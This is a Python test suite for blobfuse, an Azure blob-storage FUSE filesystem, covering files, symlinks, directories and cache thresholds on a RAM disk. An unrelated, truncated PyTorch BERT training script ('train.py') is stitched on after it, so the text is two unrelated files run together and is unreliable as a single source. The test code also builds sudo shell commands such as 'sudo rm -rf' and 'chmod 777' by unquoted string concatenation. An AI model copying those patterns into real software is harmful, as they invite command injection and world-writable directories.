os.write(fd1, testData.encode())
os.close(fd1)
self.assertEqual(os.stat(testFilePath).st_size, len(testData.encode()) * repeat)
def test_multiple_threads_create_cache_directory_simultaneous(self):
# This is to test the fix to a bug that reported failure if multiple threads simultaneously called ensure_directory_exists_in_cache.
# The directory would be successfully created, but many threads would fail because they would try to create it after another thread had already done so.
sourceDirName = "mediumblobs-2"
mediumBlobsSourceDir = os.path.join(self.blobstage, sourceDirName)
if not os.path.exists(mediumBlobsSourceDir):
os.makedirs(mediumBlobsSourceDir);
# We must use different files for each thread to avoid the synchronization that would occur if all threads access the same file
if LOCAL_TEST :
N = 2
else :
N = 20
for i in range(0, N):
filename = str(uuid.uuid4())
filepath = os.path.join(mediumBlobsSourceDir, filename)
if LOCAL_TEST :
os.system("head -c 1M < /dev/zero >> " + filepath);
else :
os.system("head -c 100M < /dev/zero >> " + filepath);
# This removes the cached entries of the files just created, so they are on the service but not local.
# This will force each thread to call ensure_directory_exists_in_cache when trying to access its file.
shutil.rmtree(self.cachedir + '/root/testing/' + sourceDirName)
threads = []
for filename in os.listdir(mediumBlobsSourceDir):
path = os.path.join(mediumBlobsSourceDir, filename)
threads.append(threading.Thread(target=self.read_file_func, args=(
path, 0, 0, "",))) # Note that read_file_func also opens the file, which is the desired behavior
for thread in threads:
thread.start()
for thread in threads:
thread.join()
shutil.rmtree(mediumBlobsSourceDir)
class CreateFileTests(BlobfuseTest):
# test to create a new file
def test_create_file_new_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT | os.O_WRONLY | os.O_TRUNC)
# open(testFilePath, "w")
self.validate_file_creation(testFilePath, testFileName, self.blobstage)
os.close(fd)
os.remove(testFilePath)
# expect error trying to create a file of a name that is already taken
def test_create_file_name_conflict_file(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
with self.assertRaises(OSError) as e:
os.open(testFilePath, os.O_EXCL | os.O_CREAT)
self.assertEqual(e.exception.errno, errno.EEXIST)
os.close(fd)
os.remove(testFilePath)
# expect error when trying to create a file with a name of the a directory that exists
def test_create_file_name_conflict_dir(self):
testFileName = "TestFile"
testFilePath = os.path.join(self.blobstage, testFileName)
os.mkdir(testFilePath)
with self.assertRaises(OSError) as e:
os.open(testFilePath, os.O_CREAT | os.O_EXCL)
self.assertEqual(e.exception.errno, errno.EEXIST)
os.rmdir(testFilePath)
def test_symlink_operations(self):
testSymlinkDir = os.path.join(self.blobstage, "test-symlink-directory")
testSymlinkFile = os.path.join(self.blobstage, "test-symlink-file")
testDir = os.path.join(self.blobstage, "test-dir")
self.assertFalse(os.path.exists(testSymlinkDir))
self.assertFalse(os.path.islink(testSymlinkDir))
os.makedirs(testDir)
os.symlink(testDir, testSymlinkDir)
self.assertTrue(os.path.exists(testDir))
self.assertTrue(os.path.islink(testSymlinkDir))
filetxt = "Some file text here."
testFilePath = os.path.join(testDir, "file1")
with open(testFilePath, 'w') as fileblob:
fileblob.write(filetxt)
os.symlink(testFilePath, testSymlinkFile)
# test accessing data with the symlink directory path
testFilewSymlinkPath = os.path.join(testSymlinkDir, "file1")
self.assertTrue(os.path.exists(testFilewSymlinkPath))
with open(testFilewSymlinkPath, 'r') as testFile:
contents = testFile.read()
self.assertEqual(filetxt, contents)
# test accessing the same data with the symlink file path
self.assertTrue(os.path.exists(testSymlinkFile))
with open(testSymlinkFile, 'r') as testFile2:
contents2 = testFile2.read()
self.assertEqual(filetxt, contents2)
class MakeDirectoryTests(BlobfuseTest):
# test for a lot of directory commands
# Test making a directory, making files in that directory, making subdirectories, and files for the subdirectories
# use listdir to check the contents of that directory
# test that we cannot remove a nonempty directory
# test that we actually removed the direcotry
def test_directory_operations(self):
testDir = os.path.join(self.blobstage, "testDirectory")
subdir1 = "subDir1"
#subdir2 = "Th0s\!is-a%directory&name @1"
self.assertFalse(os.path.exists(testDir))
self.assertFalse(os.path.isdir(testDir))
os.makedirs(testDir)
self.assertTrue(os.path.exists(testDir))
self.assertTrue(os.path.isdir(testDir))
filetxt = "Some file text here."
with open(os.path.join(testDir, "file1"), 'w') as fileblob:
fileblob.write(filetxt)
with open(os.path.join(testDir, "file2"), 'w') as fileblob:
fileblob.write(filetxt)
with open(os.path.join(testDir, "file3"), 'w') as fileblob:
fileblob.write(filetxt)
testSubDir1 = os.path.join(testDir, subdir1)
os.makedirs(testSubDir1)
#testSubDir2 = os.path.join(testDir, subdir2)
#testSubDir2 = "\"" + testSubDir2 + "\""
#os.system("sudo mkdir " + testSubDir2)
#os.system("sudo chmod 777 " + testSubDir2)
children = os.listdir(testDir);
self.assertEqual(4, len(children))
self.assertTrue("file1" in children)
self.assertTrue("file2" in children)
self.assertTrue("file3" in children)
self.assertTrue(subdir1 in children)
#self.assertTrue(subdir2 in children)
# Directory not empty should throw
os.system("sudo rm -rf " + testSubDir1)
os.remove(os.path.join(testDir, "file2"))
children = os.listdir(testDir)
self.assertEqual(2, len(children))
self.assertTrue("file1" in children)
self.assertTrue("file3" in children)
#self.assertTrue(subdir2 in children)
#os.rmdir(testSubDir2)
os.remove(os.path.join(testDir, "file1"))
os.remove(os.path.join(testDir, "file3"))
children = os.listdir(testDir)
self.assertEqual(0, len(children))
os.system("sudo rm -rf " + testDir)
self.assertFalse(os.path.exists(testDir))
self.assertFalse(os.path.isdir(testDir))
# test of validating of making an empty directory
def test_make_new_directory(self):
# Note that based on the value of self.blobdir, this also tests the relative path
testDirName = "testDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
self.validate_dir_creation(testDirPath, testDirName, self.blobstage)
os.rmdir(os.path.join(self.blobstage, testDirName))
# test if we try to make a directory with a name that already exists
def test_make_directory_name_exists(self):
testDirName = "testDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
try:
os.mkdir(testDirPath)
except OSError as e:
self.assertEqual(e.errno, errno.EEXIST)
os.rmdir(os.path.join(self.blobstage, testDirName))
# replace scandir eventually
'''
def test_close_directory(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
os.mkdir(testDirPath)
f = open(testFilePath, "w")
f.close()
entries = os.scandir(testDirPath)
entries.close()
with self.assertRaises(StopIteration):
next(entries)
os.remove(testFilePath)
os.rmdir(testDirPath)
'''''
# This test throws a errno 5 (I/O error) instead of Name too long error
# apparently in the past this tests has thrown a 400
# TODO: Figure out the appropriate error code to be thrown here otherwise this test works for the most part
'''
def test_make_directory_long_name(self):
homeDir = os.getcwd()
os.chdir(self.blobstage)
# The service currently has a limit of 1024 characters
testDir = "a"
while len(testDir) < 1100:
testDir += os.path.join(testDir, "a" * 200)
with self.assertRaises(OSError) as e:
os.makedirs(testDir)
self.assertEqual(e.exception.errno, errno.ENAMETOOLONG)
shutil.rmtree("aa")
os.chdir(homeDir)
'''
# test making a directory with an aboslute path
def test_make_directory_absolute_path(self):
testDirName = "testDir"
testDirPath = os.path.join(os.getcwd(), self.blobstage, testDirName)
testDirAbsPath = os.path.abspath(testDirPath)
os.mkdir(testDirAbsPath)
self.validate_dir_creation(testDirAbsPath, testDirName, self.blobstage)
os.rmdir(testDirAbsPath)
# test make directory and creating a file within the directory
def test_make_directory_add_file(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
testFileName = "testFile"
testFilePath = os.path.join(testDirPath, testFileName)
f = open(testFilePath, "w")
f.close()
# Note this also tests opening and reading a created directory with only files
entries = os.listdir(testDirPath)
self.assertTrue(len(entries) == 1) # Ensure we cannot see the .directory blob
self.assertTrue(entries[0] == testFileName)
os.remove(testFilePath)
os.rmdir(testDirPath)
# test making a directory and making a subdirectory within it
def test_make_directory_add_subdir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
testSubdirName = "testSubdir"
testSubdirPath = os.path.join(testDirPath, testSubdirName)
os.mkdir(testSubdirPath)
self.validate_dir_creation(testSubdirPath, testSubdirName, testDirPath)
# Note this also tests opening and reading a created directory with only directories
entries = os.listdir(testDirPath)
self.assertTrue(len(entries) == 1) # Ensure we cannot see the .directory blob
self.assertTrue(entries[0] == testSubdirName)
os.rmdir(testSubdirPath)
os.rmdir(testDirPath)
class OpenListDirectoryTests(BlobfuseTest):
# test making an empty directory and checking with list dir
def test_open_directory_dir_empty(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
entries = os.listdir(testDirPath) # Note this also tests opening via relative path on existing directory
self.assertTrue(len(entries) == 0)
os.rmdir(testDirPath)
# testing open / list dir with a nonexistent directory
def test_open_directory_dir_never_created(self):
testDirName = "Test"
testDirPath = os.path.join(self.blobstage, testDirName)
with self.assertRaises(OSError) as e:
os.listdir(testDirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
# test open / list dir on a path that's absolute
def test_open_directory_absolute_path(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testDirAbs = os.path.abspath(testDirPath)
os.mkdir(testDirAbs)
entries = os.listdir(testDirAbs)
self.assertTrue(len(entries) == 0)
os.rmdir(testDirAbs)
# test open / list dir with a directory with empty subdirectories and files
def test_open_directory_with_files_and_subdirs(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "TestFile"
testFilePath = os.path.join(testDirPath, testFileName)
testSubdirName = "TestSubdir"
testSubdirPath = os.path.join(testDirPath, testSubdirName)
os.mkdir(testDirPath)
os.mkdir(testSubdirPath)
testFile = open(testFilePath, "w")
testFile.close()
entries = os.listdir(testDirPath)
self.assertEqual(len(entries), 2)
self.assertTrue(testFileName in entries)
self.assertTrue(testSubdirName in entries)
os.remove(testFilePath)
shutil.rmtree(testDirPath)
# test list directory with a directory with nonempty subdirectory
def test_read_directory_with_non_empty_subdir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testSubdirName = "TestSubdir"
testSubdirPath = os.path.join(testDirPath, testSubdirName)
testFileName = "TestFile"
testFilePath = os.path.join(testSubdirPath, testFileName)
os.mkdir(testDirPath)
os.mkdir(testSubdirPath)
testFile = open(testFilePath, "w")
testFile.close()
entries = os.listdir(testDirPath)
self.assertEqual(len(entries), 1)
self.assertEqual(entries[0], testSubdirName)
entries = os.listdir(testSubdirPath)
self.assertEqual(len(entries), 1)
self.assertEqual(entries[0], testFileName)
os.remove(testFilePath)
shutil.rmtree(testDirPath)
# test list dir with empty directory
def test_read_directory_empty_dir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
entries = os.listdir(testDirPath)
self.assertEqual(0, len(entries))
shutil.rmtree(testDirPath)
class RemoveDirectoryTests(BlobfuseTest):
# test remove empty directory
def test_remove_directory_empty(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
os.rmdir(testDirPath) # Note this also tests removal via relative path
self.validate_dir_removal(testDirPath, testDirName, self.blobstage)
# test remove directory path that's absolute
def test_remove_directory_absolute_path(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testDirAbs = os.path.abspath(testDirPath)
os.mkdir(testDirPath)
os.rmdir(testDirAbs)
self.validate_dir_removal(testDirAbs, testDirName, self.blobstage)
# test remove directory with non empty files, expect error when trying to remove a directory without
# removing the files first
def test_remove_directory_non_empty_files(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(testDirPath, testFileName)
os.mkdir(testDirPath)
testFile = open(testFilePath, "w")
testFile.close()
if not ADLS_TEST :
try:
os.rmdir(testDirPath)
except OSError as e:
self.assertEqual(e.errno, errno.ENOTEMPTY)
os.system("sudo rm -rf "+ testFilePath)
os.system("sudo rm -rf "+ testDirPath)
# test removing a directory with a non empty subdirectory, expect an error if trying to remove the
# parent directory without first emptying the file and subdirectory or removing it recursively
def test_remove_directory_non_empty_subdir(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testSubdirName = "TestSubdir"
testSubdirPath = os.path.join(testDirPath, testSubdirName)
os.makedirs(testSubdirPath)
if not ADLS_TEST :
try:
os.rmdir(testDirPath)
except OSError as e:
self.assertEqual(e.errno, errno.ENOTEMPTY)
os.system("sudo rm -rf "+ testSubdirPath)
os.system("sudo rm -rf "+ testDirPath)
# test removing the directory that doesn't exist
def test_remove_directory_never_created(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
with self.assertRaises(OSError) as e:
os.rmdir(testDirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
# test removing a directory and expect an error when attempting to open the directory
def test_remove_directory_cd_into(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
os.mkdir(testDirPath)
os.rmdir(testDirPath)
homeDir = os.getcwd()
with self.assertRaises(OSError) as e:
os.chdir(testDirPath)
self.assertEqual(e.exception.errno, errno.ENOENT)
os.chdir(homeDir)
# use listdir tests instead unless earlier versions of python are available
'''
def test_close_directory(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
os.mkdir(testDirPath)
f = open(testFilePath, "w")
f.close()
entries = os.scandir(testDirPath)
entries.close()
with self.assertRaises(StopIteration):
next(entries)
os.remove(testFilePath)
os.rmdir(testDirPath)
def test_close_directory_already_closed(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
os.mkdir(testDirPath)
f = open(testFilePath, "w")
f.close()
entries = os.scandir(testDirPath) #use scandir with newer versions of python
entries.close()
entries.close()
os.remove(testFilePath)
os.rmdir(testDirPath)
'''
# test fuse handling a crash, when attempting to close a file that has the same name as a blob
# but that's not in the mounted container
def test_fuse_crash(self):
testDirName = "TestDir"
testDirPath = os.path.join(self.blobstage, testDirName)
testFileName = "TestFile"
testFilePath = os.path.join(testDirPath, testFileName)
testSubdirName = "TestSubdir"
testSubdirPath = os.path.join(testDirPath, testSubdirName)
os.mkdir(testDirPath)
os.mkdir(testSubdirPath)
testFile = open(testFilePath, "w")
with self.assertRaises(TypeError) as e:
testFile.close(testFile) # This line seems to make fuse crash
testFile.close()
entries = os.listdir(testDirPath)
self.assertTrue(len(entries) == 2)
self.assertTrue(testFileName in entries)
self.assertTrue(testSubdirName in entries)
os.remove(testFilePath)
shutil.rmtree(testDirPath)
# TODO: implement flock
'''
class FlockTests(BlobfuseTest):
def test_file_lock_shared(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_SH)
fd2 = os.open(testFilePath, os.O_WRONLY)
fcntl.flock(fd2, fcntl.LOCK_SH) # Acquiring two shared locks is valid
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_exclusive(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
fd2 = os.open(testFilePath, os.O_WRONLY)
with self.assertRaises(BlockingIOError) as e:
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertEqual(e.exception.errno, errno.EAGAIN)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_shared_then_exclusive(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_SH)
fd2 = os.open(testFilePath, os.O_WRONLY)
with self.assertRaises(BlockingIOError) as e:
fcntl.flock(fd2, fcntl.LOCK_EX | fcntl.LOCK_NB)
self.assertEqual(e.exception.errno, errno.EAGAIN)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_exclusive_then_shared(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
fd2 = os.open(testFilePath, os.O_WRONLY)
with self.assertRaises(BlockingIOError) as e:
fcntl.flock(fd2, fcntl.LOCK_SH | fcntl.LOCK_NB)
self.assertEqual(e.exception.errno, errno.EAGAIN)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_change_type(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
fcntl.flock(fd, fcntl.LOCK_SH)
fd2 = os.open(testFilePath, os.O_WRONLY)
fcntl.flock(fd2, fcntl.LOCK_SH)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_release(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
fcntl.flock(fd, fcntl.LOCK_UN)
fd2 = os.open(testFilePath, os.O_WRONLY)
fcntl.flock(fd2, fcntl.LOCK_EX)
os.close(fd)
os.close(fd2)
os.remove(testFilePath)
def test_file_lock_release_on_close(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
os.close(fd)
fd = os.open(testFilePath, os.O_WRONLY)
fcntl.flock(fd, fcntl.LOCK_EX)
os.close(fd)
os.remove(testFilePath)
def test_file_lock_close_file(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
os.close(fd)
with self.assertRaises(OSError) as e:
fcntl.flock(fd, fcntl.LOCK_SH)
self.assertEqual(e.exception.errno, errno.EBADF)
os.remove(testFilePath)
def test_file_lock_release_never_acquired(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_UN)
os.close(fd)
os.remove(testFilePath)
def try_lock_file(self, filePath):
fd = os.open(filePath, os.O_WRONLY)
fcntl.flock(fd, fcntl.LOCK_EX)
def test_file_block_on_lock(self):
testFileName = "testFile"
testFilePath = os.path.join(self.blobstage, testFileName)
fd = os.open(testFilePath, os.O_CREAT)
fcntl.flock(fd, fcntl.LOCK_EX)
# We want to assert that the file is locked even between processes, not just threads
process = multiprocessing.Process(target=self.try_lock_file, args=(testFilePath,))
process.start()
process.join(2)
# If the process has exitcode=none, it is still running and therefore blocked as expected
self.assertIsNone(process.exitcode)
process.terminate()
os.close(fd)
os.remove(testFilePath)
'''
#note: these tests take a certain amount of time due to the volume of files
#filling the mounted container, emptying the container and waiting for the cache to clear itself
#in order to make it more efficient to fill the cache without taking so much time
#we allocate a small ram disk in order to reach capacity with the disk
#also make sure this test is in the python_test directory
#if you have issues running these tests due to access permissions issue. It might help to
#manually run 'sudo chown <username> <foldername>' before these tests
class CacheTests(BlobfuseTest):
#path to ramdisk
ramDiskPath = "/mnt/ramdisk"
#path to cache container for blobfuse in ramdisk
ramDiskTmpPath = "/mnt/ramdisk/blobfuseTmp"
#path to mounted container in ramdisk
ramDiskContainerPath = "/mnt/ramdiskMountedCnt"
#upper/high threshold
upper_threshold = 90
#lower/bottom threshold
lower_threshold = 80
#os.system("sudo rm -rf " + ramDiskContainerPath)
def setUp(self):
print (" >> ", self._testMethodName)
# create temp/cache directory
if not os.path.exists(self.ramDiskPath):
#os.mkdir(self.ramDiskPath)
os.system("sudo mkdir " + self.ramDiskPath)
os.system("sudo chown -R `whoami` " + self.ramDiskPath)
os.system("sudo chmod 777 " + self.ramDiskPath)
if not os.path.exists(self.ramDiskTmpPath):
#os.mkdir(self.ramDiskTmpPath)
os.system("sudo mkdir " + self.ramDiskTmpPath)
os.system("sudo chown -R `whoami` " + self.ramDiskTmpPath)
os.system("sudo chmod 777 " + self.ramDiskTmpPath)
#os.chown(self.ramDiskTmpPath, os.geteuid(), os.getgid())
if not os.path.exists(self.ramDiskContainerPath):
#os.mkdir(self.ramDiskContainerPath)
os.system("sudo mkdir " + self.ramDiskContainerPath)
#os.system("sudo chown -R `whoami` " + self.ramDiskContainerPath)
os.system("sudo chmod 777 " + self.ramDiskContainerPath)
#os.chown(self.ramDiskContainerPath, os.geteuid(), os.getgid())
def tearDown(self):
# unmount blobfuse
os.system("fusermount -u " + self.ramDiskContainerPath)
#unmount ramdisk
os.system("sudo umount " + self.ramDiskPath)
#delete container directory if still exists
#if os.path.exists(self.ramDiskContainerPath):
#shutil.rmtree(self.ramDiskContainerPath)
#os.system("sudo rm -rf "+ self.ramDiskContainerPath + "/*")
#delete cache/temp directory if still exists
if os.path.exists(self.ramDiskTmpPath):
#shutil.rmtree(self.ramDiskTmpPath)
os.system("sudo rm -rf "+ self.ramDiskTmpPath + "/*")
#delete cache/temp directory if still exists
if os.path.exists(self.ramDiskPath):
#shutil.rmtree(self.ramDiskPath)
os.system("sudo rm -rf "+ self.ramDiskPath + "/*")
def makeRamDisk(self, disk_size):
#create ramdisk, give current user access to the ramdisk and mount
os.system("sudo mount -t tmpfs -o size=" + disk_size + " tmpfs " + self.ramDiskPath)
def startBlobfuse(self, cache_timeout):
#call blobfuse using ramdisk as the cache directory
#os.system("sudo kill -9 `pidof blobfuse`")
#os.system("sudo fusermount -u " + self.blobdir)
#os.system("rm -rf " + self.cachedir + "/*")
os.system("rm -rf " + self.ramDiskTmpPath + "/*")
os.system("rm -rf " + self.ramDiskContainerPath + "/*")
#os.system("sudo fusermount -u " + self.ramDiskContainerPath)
blobfuseMountCmd = "./blobfuse " + self.ramDiskContainerPath + " --tmp-path=" + self.ramDiskTmpPath + \
" -o attr_timeout=240 -o entry_timeout=240 -o negative_timeout=120 -o allow_other " \
"--file-cache-timeout-in-seconds=" + cache_timeout + \
" --config-file=../connection.cfg --log-level=LOG_DEBUG --use-attr-cache=true"
if ADLS_TEST :
blobfuseMountCmd = blobfuseMountCmd + " --use-adls=true"
os.chdir(os.path.dirname(os.path.abspath(__file__)) + "/../build")
os.system(blobfuseMountCmd)
def test_cache_large_files(self):
testDirName = "testLargeFileDir"
testDirPath = os.path.join(self.ramDiskContainerPath, testDirName)
ramDiskSize = "1024M"
cacheTimeout = "120"
self.makeRamDisk(ramDiskSize)
self.startBlobfuse(cacheTimeout)
# arrange
if not os.path.exists(testDirPath):
os.mkdir(testDirPath)
#os.chown(testDirPath, os.geteuid(), os.getgid())
filename = str(uuid.uuid4())
# act (create many files)
for i in range(0, 5):
filename = str(uuid.uuid4())
filepath = os.path.join(testDirPath, filename)
if LOCAL_TEST :
os.system("head -c 1M < /dev/zero > " + filepath)
else :
os.system("head -c 1M < /dev/urandom > " + filepath)
os.system("head -c 200M < /dev/zero >> " + filepath)
os.system("head -c 2M < /dev/urandom >> " + filepath)
#this makes 1015MB, so it fills the cache, so the threshold should be met
#assert (check cache)
#check how close we are to threshold after filling the cache
#if we are past low threshold, fail the test
#if we are under then we assured we deleted to not hit the threshold
df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
output = df.communicate()[0]
#print (output)
if LOCAL_TEST :
device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
else :
device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
if LOCAL_TEST :
print("Ignoring usage check in Local Test")
else :
self.assertLessEqual(int(percent.strip('%')), self.lower_threshold)
# cleanup
if os.path.exists(testDirPath):
os.system("sudo rm -rf " + testDirPath)
def test_cache_small_files(self):
testDirName = "testSmallFileDir"
testDirPath = os.path.join(self.ramDiskContainerPath, testDirName)
ramDiskSize = "100M"
cacheTimeout = "120"
self.makeRamDisk(ramDiskSize)
self.startBlobfuse(cacheTimeout)
#arrange
if not os.path.exists(testDirPath):
#os.mkdir(testDirPath)
os.system("sudo mkdir " + testDirPath)
#os.chown(testDirPath, os.geteuid(), os.getgid())
#os.system("sudo chown `whoami` " + testDirPath)
if ADLS_TEST :
os.system("sudo chmod 777 " + testDirPath)
filename = str(uuid.uuid4())
#act (create many files)
for i in range(0, 8):
filename = str(uuid.uuid4())
filepath = os.path.join(testDirPath, filename)
if LOCAL_TEST :
os.system("head -c 1M < /dev/zero >> " + filepath)
else :
os.system("head -c 1M < /dev/urandom > " + filepath)
os.system("head -c 7M < /dev/zero >> " + filepath)
os.system("head -c 2M < /dev/urandom >> " + filepath)
# assert (check cache)
# check if we reached the low threshold. we expect no cleanup and to stay at the low threshold
df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
output = df.communicate()[0]
#print (output)
if LOCAL_TEST :
device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
else :
device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
#self.assertLess(int(percent.strip('%')), self.lower_threshold)
#if we add another file then it should reduce the cache size to below the lower threshold
#because we hit the high threshold
filename = str(uuid.uuid4())
filepath = os.path.join(testDirPath, filename)
if not LOCAL_TEST :
os.system("head -c 1M < /dev/urandom > " + filepath)
os.system("head -c 7M < /dev/zero >> " + filepath)
os.system("head -c 2M < /dev/urandom >> " + filepath)
# assert (check cache)
# check how close we are to threshold after filling the cache
# if we are past the low threshold, fail the test
# if we are under then we assured we deleted to not hit the threshold
df = subprocess.Popen(["df", self.ramDiskTmpPath], stdout=subprocess.PIPE)
output = df.communicate()[0]
if LOCAL_TEST :
device, size, used, available, percent, mountpoint = str(output).split("\\n")[1].split()
else :
device, size, used, available, percent, mountpoint = str(output).split("\n")[1].split()
if LOCAL_TEST :
print("Ingoring usage check for Local Test")
else :
self.assertLessEqual(int(percent.strip('%')), self.lower_threshold)
# cleanup
if os.path.exists(testDirPath):
os.system("sudo rm -rf " + testDirPath)
if __name__ == '__main__':
unittest.main()
|
train.py | #!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import os
import random
import signal
import torch
import distributed
import numpy as np
from transformers import BertTokenizer
from models import data_loader
from models.data_loader import load_dataset
from models.optimizers import build_optim, build_optim_bert, build_optim_other
from models.model import Model as graph_model
from models.model_trainer import build_trainer as graph_build_trainer
from models.seq2seq import Model as seq2seq_model
from models.seq2seq_trainer import build_trainer as seq2seq_build_trainer
from others.logging import logger, init_logger
model_flags = ['encoder', 'decoder', 'enc_heads', 'enc_layers', 'enc_hidden_size', 'enc_ff_size',
'dec_heads', 'dec_layers', 'dec_hidden_size', 'dec_ff_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def train_multi(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks, args.port)
print('gpu_rank %d' % gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train_single(args, device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def train(args, device_id):
if (args.world_size > 1):
train_multi(args)
else:
train_single(args, device_id)
def train_single(args, device_id):
init_logger(args.log_file)
logger.info(str(args))
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
else:
checkpoint = None
torch.manual_seed(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True),
args.batch_size, args.batch_ex_size, device,
shuffle=True, is_test=False)
